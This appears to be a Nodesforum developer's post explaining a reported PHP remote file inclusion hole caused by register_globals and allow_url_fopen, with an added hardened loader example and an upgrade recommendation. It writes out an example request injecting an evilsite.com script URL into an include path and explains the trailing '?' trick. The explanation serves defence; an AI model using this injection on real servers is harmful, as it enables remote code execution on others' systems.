Anyways, I must say that this bd0rk is not super friendly. Of all my attempts to talk to him about the exploit and ask him for more information, he only once answered me with a very minimal answer confirming that he was indeed using nodesforum 1.059. He never agreed to give me more information about how he was accomplishing the exploit, or to confirm to me that 1.060 fixed the hole. Even though I'm 99.99999999% sure it does, and Rob Keith from securityfocus.com confirmed that "Looking through the latest code, the exploit would fail as described.", I'm not sure if he was referring to 1.059 or 1.060.
In case you did not know, what people do to accomplish this type of "remote file inclusion" is use the register_globals feature of PHP. What this feature does is turn $_GET variables (the query-string parameters of the request) into ordinary PHP variables in the execution of the script. For example, on a PHP server with register_globals on, going to the URL
http://website.com/webpage?varname=varvalue would be the same as adding
code:
$varname = 'varvalue';
at the beginning of the script.
So the problem is if you have, in a certain PHP file, like in the nodesforum, something like
code:
include($nodesforum_code_path.'/somecode.php');
and $nodesforum_code_path is not declared in this PHP file, because this file is meant to be included by another file which is responsible for setting $nodesforum_code_path. Someone could use this as a door to run their own PHP scripts on your server: by requesting the file directly at
http://website.com/webpage?nodesforum_code_path=http://evilsite.com/evilscript.php?
it ends up running
code:
include('http://evilsite.com/evilscript.php?/somecode.php');
The trailing "?" in the injected value turns the "/somecode.php" that the script appends into a harmless query string, so the whole thing is fetched as a URL and whatever evilscript.php returns is executed as PHP on your server.
Next, the server also needs to have "allow_url_fopen" enabled, so that include() is allowed to fetch the remote (http://) script at all.
And if you are wondering what kind of script is the attacker going to be running on your server, take a look at this:
http://www.google.ca/search?q=c99+remote+inclusion
So in other words, to be vulnerable to this kind of attack you need to run your PHP with both "register_globals" and "allow_url_fopen" enabled. If you are running on your own server, it is highly encouraged that you do not enable "register_globals"; it is mostly required by old PHP scripts that were built a long time ago. It may be hard to leave "allow_url_fopen" disabled, though, because it can be useful for many things. If you are using a shared server, most chances are that all of this is going to be enabled, because the host wants to make sure everything will work for everyone. As a side note to all the attackers who have been trying their luck since the publication of this potential security hole: the nodesforum server does not have "register_globals" enabled, so these attacks are useless.
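The following is an added example, not code from the nodesforum project or from the author of this post; it shows the include pattern described above next to one common hardened layout. File names (index.php, somecode_loader.php), the NODESFORUM_ENTRY constant and the nodesforum_safe_code_path() helper are assumptions made for the illustration. As a caveat not mentioned in the post: on PHP 5.2 and later, include() of an http:// URL is additionally governed by the "allow_url_include" setting, which defaults to off, so keeping that off is a third server-side layer on top of disabling register_globals.

```php
<?php
// Added example (not nodesforum code). Two constructed files in one listing.

// ===== somecode_loader.php: the file that is only meant to be include()d =====
//
// Vulnerable shape, as described in the post. With register_globals=On and
// this file requested directly as ?nodesforum_code_path=http://evilsite.example/?
// the variable is already set from the query string when this line runs:
//
//     include($nodesforum_code_path . '/somecode.php');
//
// Hardened shape below uses two independent layers.

// Layer 1: entry-point guard. Only index.php defines this constant, before it
// includes anything. register_globals populates variables, never constants,
// so a direct request to this file cannot fake it and simply stops here.
if (!defined('NODESFORUM_ENTRY')) {
    header('HTTP/1.1 403 Forbidden');
    exit('Direct access not permitted.');
}

/**
 * Layer 2: refuse any include path that is a URL wrapper or that resolves
 * outside the installation directory. Even if a path variable were somehow
 * overwritten from the request, it could not point at a remote script.
 */
function nodesforum_safe_code_path(string $candidate, string $installDir): string
{
    // Reject stream wrappers such as http://, ftp://, php://, data:// outright.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $candidate)) {
        throw new RuntimeException('Refusing URL include path: ' . $candidate);
    }
    $real = realpath($candidate);
    $base = rtrim(realpath($installDir), DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    // realpath() returns false for non-existent paths; also require the
    // resolved directory to sit inside the installation directory.
    if ($real === false || strpos($real . DIRECTORY_SEPARATOR, $base) !== 0) {
        throw new RuntimeException('Refusing include path outside installation: ' . $candidate);
    }
    return $real;
}

// Derive the code path from this file's own location rather than trusting a
// variable that a request could have set, then validate it anyway.
$nodesforum_code_path = nodesforum_safe_code_path(__DIR__, __DIR__);
include $nodesforum_code_path . '/somecode.php';

// ===== index.php: the only file that is supposed to be requested directly =====
//
//     <?php
//     define('NODESFORUM_ENTRY', true);   // must come before any include
//     require __DIR__ . '/somecode_loader.php';
```

The guard constant is the cheap, code-level fix an application can ship regardless of how the hosting provider has configured php.ini; the path check is defence in depth for installations that still pass directories around in variables. Neither replaces turning register_globals off on the server, which is what actually removes the attacker's ability to set the variable in the first place.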
The only mystery that remains with this story is that initially, when I first created the nodesforum, being completely unaware of the existence of the "register_globals" feature, I had left this huge security hole in the forum script. It was not an issue for me because my "register_globals" was off by default (thanks Ubuntu!), but someone pointed it out and I made a fix in version 1.046 of the forum. I still look at my 1.046 fix today and it looks good to me; I cannot see how the remote inclusion attack could succeed with this security measure in place, but this person bd0rk claims that he can perform the file inclusion attack on 1.059, and has reconfirmed it.
So anyways, I decided not to take any chances and I thought of a new security measure that could protect against this. I added the new measure on top of the old one to put all the chances on my side. If you are using the Nodesforum on a shared server, I highly recommend that you upgrade to Nodesforum 1.060 or higher to protect yourself against this kind of attack.